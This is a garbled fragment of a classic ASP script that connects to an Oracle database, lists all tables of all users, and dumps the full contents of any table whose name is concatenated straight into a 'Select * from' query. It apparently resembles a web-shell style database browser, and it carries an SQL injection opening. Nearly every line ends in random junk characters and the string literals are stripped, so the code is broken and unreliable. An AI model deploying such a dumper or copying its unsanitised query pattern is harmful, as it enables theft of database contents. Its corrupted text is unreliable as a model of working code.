0 then " aq'R(/`c
Response.Write 错误 : & err.description & Z4hLdHo_
response.end riCV&0"n
End if WE6\dhJ<
End Sub }Ln@R~[
Sub EndDB() ~/-eyxLTm
Set objOraDB = Nothing -rSIBc:$8
Set objOraSession = Nothing {fDTSr?/
End Sub vF4]ux&
Function getTableList(str) |L::bx(
Dim strSql,strTmp #X`8dnQZ
Dim objRs K84^Oq
strSql = Select at.table_name as tname,au.username as uname from all_tables at,all_users au Where au.username=at.owner order by au.username ^G|98yc!'
Set objRs = objOraDb.DbCreateDynaset(strSql,0) xT*d/Oa w
While Not objRs.Eof jz'<
strA = objRs(uname) & . & objRs(tname) *>q/WLR
If str=strA then :c.JhE3D
strTmp = strTmp & & strA & q%/uQT?
Else oxz{ ejd{
strTmp = strTmp & & strA & kc$)^E7
End if +wO#'D
objRs.MoveNext pz|'l:v^
Wend E JK0
Set objRs = Nothing #8h;Bj
getTableList = strTmp r8/l P}(F
End Function aM=D84@
% > ?GT@puJS-
All Tables : </"4 zD|
() 0CExY9@Wq
then O9M{ ).
strSql = Select * from & tblname 0s#Kp49-
Set Rs = objOraDb.DbCreateDynaset(strSql,0) 9N8I
Response.Write M8&}j
for i=0 to rs.Fields.count-1 MCTsi:V>+
Response.Write & rs.fields(i).name & \nqkA{;B{
next p0:kz l4$
Response.Write OO) ~HV4\
While Not Rs.Eof +IFw_3$
Response.Write /=?x{(B>
for i=0 to rs.fields.count -1
Response.Write & Rs.Fields(i).Value & N)2f7j4C&
next nIk$7rGLB
Response.Write V$`Gwr]|n
Rs.MoveNext IM@tN L
Wend ?~e3&ux
Set Rs = Nothing fwR_OB:$
end if 7- d.ZG
% > <O<LYN+(
Z8O n%Mx{"
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